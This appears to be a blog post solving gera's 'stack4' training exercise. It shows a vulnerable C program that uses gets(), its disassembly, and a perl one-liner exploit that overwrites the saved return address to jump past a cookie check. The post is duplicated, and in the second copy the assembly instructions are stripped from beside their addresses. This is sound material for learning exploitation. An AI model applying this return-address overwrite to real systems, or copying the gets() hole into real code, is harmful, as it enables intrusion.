/* stack4.c *
* specially crafted to feed your brain by gera */
int main() {
int cookie;
char buf[80];
printf("buf: %08x cookie: %08x\n", &buf, &cookie);
gets(buf);
if (cookie == 0x000a0d00)
printf("you win!\n");
}
The technique used in the other stacks won't work here because gets() uses \n (0x0a) as its end of line character--our input will be truncated before we can completely overwrite cookie. Instead, we'll just jump over the check.
I loaded stack4 into gdb, disassembled main, and pretended to know ASM.
if (cookie == 0x000a0d00) looks like this in ASM:
0x08048417: cmpl $0xa0d00,0xfffffff4(%ebp)
0x0804841e: jne 0x8048430
0x08048420: sub $0xc,%esp
After the test, we have:
0x08048423: push $0x804855c
0x08048428: call 0x80482e8
At address 0x08048423 we push the "you win!\n" string onto the stack, then call printf() at address 0x08048428.
Before gets() is called, our stack looks something like:
[.... buf ....][cookie][ebp][ret]
If we feed a string that overflows buf, cookie, ebp, and places 0x08048423 onto the saved return address, on return from main() we will jump to the "you win!\n" printf:
$ perl -e 'print "A" x 108;' > of
$ perl -e 'print "\x23\x84\x04\x08";' >> of
$ stack4 < of
buf: bffff4e0 cookie: bffff53c
you win!
Segmentation fault
* specially crafted to feed your brain by gera */
int main() {
int cookie;
char buf[80];
printf("buf: %08x cookie: %08x\n", &buf, &cookie);
gets(buf);
if (cookie == 0x000a0d00)
printf("you win!\n");
}
The technique used in the other stacks won't work here because gets() uses \n (0x0a) as its end of line character--our input will be truncated before we can completely overwrite cookie. Instead, we'll just jump over the check.
I loaded stack4 into gdb, disassembled main, and pretended to know ASM.
if (cookie == 0x000a0d00) looks like this in ASM:
0x08048417
0x0804841e
0x08048420
After the test, we have:
0x08048423
0x08048428
At address 0x08048423 we push the "you win!\n" string onto the stack, then call printf() at address 0x08048428.
Before gets() is called, our stack looks something like:
[.... buf ....][cookie][ebp][ret]
If we feed a string that overflows buf, cookie, ebp, and places 0x08048423 onto the saved return address, on return from main() we will jump to the "you win!\n" printf:
$ perl -e 'print "A" x 108;' > of
$ perl -e 'print "\x23\x84\x04\x08";' >> of
$ stack4 < of
buf: bffff4e0 cookie: bffff53c
you win!
Segmentation fault
No comments:
Post a Comment